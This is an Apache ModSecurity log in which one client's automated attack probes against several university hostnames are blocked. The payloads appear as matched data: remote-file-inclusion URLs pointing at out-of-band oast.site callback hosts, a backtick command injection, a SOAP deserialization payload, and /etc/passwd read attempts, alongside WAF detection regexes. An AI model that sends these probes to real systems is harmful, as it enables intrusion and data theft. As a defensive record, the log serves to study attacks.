[Tue Aug 29 11:33:12.785430 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgy6hguume8gdd4.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgy6hguume8gdd4.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARH7NwAAAAM"]
[Tue Aug 29 11:33:12.804664 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgjurfgza63qngx.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgjurfgza63qngx.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARNk9IAAAAS"]
[Tue Aug 29 11:33:12.808535 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlguawxk4sb3uter.oast.site found within TX:1: cjmn8l5jmimk2adbbnlguawxk4sb3uter.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11CMCo-f0AAARD1TYAAAAH"]
[Tue Aug 29 11:33:12.824508 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:hostname: `id`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/controller/ping.php"] [unique_id "ZO11CMCo-f0AAARTEMEAAAAG"]
[Tue Aug 29 11:33:13.305303 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgwj4gazay9wdhz.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgwj4gazay9wdhz.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARD1TgAAAAH"]
[Tue Aug 29 11:33:13.305547 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:(?:n(?:et(?:\\\\b\\\\W+?\\\\blocalgroup|\\\\.exe)|(?:map|c)\\\\.exe)|t(?:racer(?:oute|t)|elnet\\\\.exe|clsh8?|ftp)|(?:w(?:guest|sh)|rcmd|ftp)\\\\.exe|echo\\\\b\\\\W*?\\\\by+)\\\\b|c(?:md(?:(?:\\\\.exe|32)\\\\b|\\\\b\\\\W*?\\\\/c)|d(?:\\\\b\\\\W*?[\\\\/]|\\\\W*?\\\\.\\\\.)|hmod.{0,40}?\\\\ ..." at ARGS:hostname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "221"] [id "950006"] [rev "3"] [msg "System Command Injection"] [data "Matched Data: `id found within ARGS:hostname: `id`"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/controller/ping.php"] [unique_id "ZO11CcCo-f0AAARQ37AAAAAB"]
[Tue Aug 29 11:33:13.316360 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlg6gw47hjjomnin.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg6gw47hjjomnin.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARTEMMAAAAG"]
[Tue Aug 29 11:33:13.319350 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlg9o1uykpntdjx1.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg9o1uykpntdjx1.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARH7OAAAAAM"]
[Tue Aug 29 11:33:13.324425 2023] [:error] [pid 1112] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgjs3bif36azfxo.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgjs3bif36azfxo.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARYxDMAAAAJ"]
[Tue Aug 29 11:33:13.325503 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgo9sjc56auongr.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgo9sjc56auongr.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARdiHEAAAAK"]
[Tue Aug 29 11:33:13.346561 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlg8rj7dz6oimpo1.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg8rj7dz6oimpo1.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARdiHIAAAAK"]
[Tue Aug 29 11:33:13.356008 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlg763gp4qtu7mi4.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg763gp4qtu7mi4.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARR27YAAAAF"]
[Tue Aug 29 11:33:13.363445 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgnmrwuo49jy8on.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgnmrwuo49jy8on.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARTEMUAAAAG"]
[Tue Aug 29 11:33:13.365327 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlge6wb19jrfr7n3.oast.site found within TX:1: cjmn8l5jmimk2adbbnlge6wb19jrfr7n3.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARQ37IAAAAB"]
[Tue Aug 29 11:33:13.365413 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgyeybwjzho7dds.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgyeybwjzho7dds.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARD1ToAAAAH"]
[Tue Aug 29 11:33:13.379844 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlgmuzrytjg4jh6x.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgmuzrytjg4jh6x.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARH7OIAAAAM"]
[Tue Aug 29 11:33:13.419143 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmn8l5jmimk2adbbnlg66pwpkhuzx1yq.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg66pwpkhuzx1yq.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARA7egAAAAA"]
[Tue Aug 29 11:33:13.460974 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlg6r1goma87a9yt.oast.site found within TX:1: cjmn8l5jmimk2adbbnlg6r1goma87a9yt.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARTEMYAAAAG"]
[Tue Aug 29 11:33:13.503237 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: https://cjmn8l5jmimk2adbbnlgkeh4bracyp5wp.oast.site found within TX:1: cjmn8l5jmimk2adbbnlgkeh4bracyp5wp.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/"] [unique_id "ZO11CcCo-f0AAARNk9cAAAAS"]
[Tue Aug 29 11:33:14.384420 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:stagingTaskData. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x22>\\x0a  < found within ARGS:stagingTaskData: <SOAP-ENV:Envelope xmlns:xsi=\\x22http://www.w3.org/2001/XMLSchema-instance\\x22 xmlns:xsd=\\x22http://www.w3.org/2001/XMLSchema\\x22 xmlns:SOAP-ENC=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22 xmlns:SOAP-ENV=\\x22http://schemas.xmlsoap.org/soap/envelope/\\x22 xmlns:clr=\\x22http://schemas.microsoft.com/soap/encoding/clr/1.0\\x22 SOAP-ENV:encodingStyle=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22>\\x0a  <SOAP-ENV:Body>\\x0a    <a1:WindowsIden..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"] [unique_id "ZO11CsCo-f0AAARdiHMAAAAK"]
[Tue Aug 29 11:33:14.385085 2023] [:error] [pid 1107] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:stagingTaskData. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x22>\\x0a  < found within ARGS:stagingTaskData: <SOAP-ENV:Envelope xmlns:xsi=\\x22http://www.w3.org/2001/XMLSchema-instance\\x22 xmlns:xsd=\\x22http://www.w3.org/2001/XMLSchema\\x22 xmlns:SOAP-ENC=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22 xmlns:SOAP-ENV=\\x22http://schemas.xmlsoap.org/soap/envelope/\\x22 xmlns:clr=\\x22http://schemas.microsoft.com/soap/encoding/clr/1.0\\x22 SOAP-ENV:encodingStyle=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22>\\x0a  <SOAP-ENV:Body>\\x0a    <a1:WindowsIden..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"] [unique_id "ZO11CsCo-f0AAARTEMcAAAAG"]
[Tue Aug 29 11:33:14.388039 2023] [:error] [pid 1088] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:stagingTaskData. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x22>\\x0a  < found within ARGS:stagingTaskData: <SOAP-ENV:Envelope xmlns:xsi=\\x22http://www.w3.org/2001/XMLSchema-instance\\x22 xmlns:xsd=\\x22http://www.w3.org/2001/XMLSchema\\x22 xmlns:SOAP-ENC=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22 xmlns:SOAP-ENV=\\x22http://schemas.xmlsoap.org/soap/envelope/\\x22 xmlns:clr=\\x22http://schemas.microsoft.com/soap/encoding/clr/1.0\\x22 SOAP-ENV:encodingStyle=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22>\\x0a  <SOAP-ENV:Body>\\x0a    <a1:WindowsIden..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"] [unique_id "ZO11CsCo-f0AAARA7ekAAAAA"]
[Tue Aug 29 11:33:14.388332 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:stagingTaskData. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x22>\\x0a  < found within ARGS:stagingTaskData: <SOAP-ENV:Envelope xmlns:xsi=\\x22http://www.w3.org/2001/XMLSchema-instance\\x22 xmlns:xsd=\\x22http://www.w3.org/2001/XMLSchema\\x22 xmlns:SOAP-ENC=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22 xmlns:SOAP-ENV=\\x22http://schemas.xmlsoap.org/soap/envelope/\\x22 xmlns:clr=\\x22http://schemas.microsoft.com/soap/encoding/clr/1.0\\x22 SOAP-ENV:encodingStyle=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22>\\x0a  <SOAP-ENV:Body>\\x0a    <a1:WindowsIden..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"] [unique_id "ZO11CsCo-f0AAARD1TsAAAAH"]
[Tue Aug 29 11:33:14.391310 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:stagingTaskData. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x22>\\x0a  < found within ARGS:stagingTaskData: <SOAP-ENV:Envelope xmlns:xsi=\\x22http://www.w3.org/2001/XMLSchema-instance\\x22 xmlns:xsd=\\x22http://www.w3.org/2001/XMLSchema\\x22 xmlns:SOAP-ENC=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22 xmlns:SOAP-ENV=\\x22http://schemas.xmlsoap.org/soap/envelope/\\x22 xmlns:clr=\\x22http://schemas.microsoft.com/soap/encoding/clr/1.0\\x22 SOAP-ENV:encodingStyle=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22>\\x0a  <SOAP-ENV:Body>\\x0a    <a1:WindowsIden..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"] [unique_id "ZO11CsCo-f0AAARH7OMAAAAM"]
[Tue Aug 29 11:33:14.420121 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:stagingTaskData. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /\\x22>\\x0a  < found within ARGS:stagingTaskData: <SOAP-ENV:Envelope xmlns:xsi=\\x22http://www.w3.org/2001/XMLSchema-instance\\x22 xmlns:xsd=\\x22http://www.w3.org/2001/XMLSchema\\x22 xmlns:SOAP-ENC=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22 xmlns:SOAP-ENV=\\x22http://schemas.xmlsoap.org/soap/envelope/\\x22 xmlns:clr=\\x22http://schemas.microsoft.com/soap/encoding/clr/1.0\\x22 SOAP-ENV:encodingStyle=\\x22http://schemas.xmlsoap.org/soap/encoding/\\x22>\\x0a  <SOAP-ENV:Body>\\x0a    <a1:WindowsIden..."] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"] [unique_id "ZO11CsCo-f0AAARD1TwAAAAH"]
[Tue Aug 29 11:33:14.452505 2023] [:error] [pid 1105] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:inUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:inUrl: file///etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wavemaker/studioService.download"] [unique_id "ZO11CsCo-f0AAARR27gAAAAF"]
[Tue Aug 29 11:33:14.460428 2023] [:error] [pid 1091] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:inUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:inUrl: file///etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wavemaker/studioService.download"] [unique_id "ZO11CsCo-f0AAARD1T0AAAAH"]
[Tue Aug 29 11:33:14.460818 2023] [:error] [pid 1095] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:inUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:inUrl: file///etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wavemaker/studioService.download"] [unique_id "ZO11CsCo-f0AAARH7OQAAAAM"]
[Tue Aug 29 11:33:14.461649 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:inUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:inUrl: file///etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wavemaker/studioService.download"] [unique_id "ZO11CsCo-f0AAANsAdMAAAAD"]
[Tue Aug 29 11:33:14.479185 2023] [:error] [pid 1101] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:inUrl. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:inUrl: file///etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wavemaker/studioService.download"] [unique_id "ZO11CsCo-f0AAARNk9oAAAAS"]
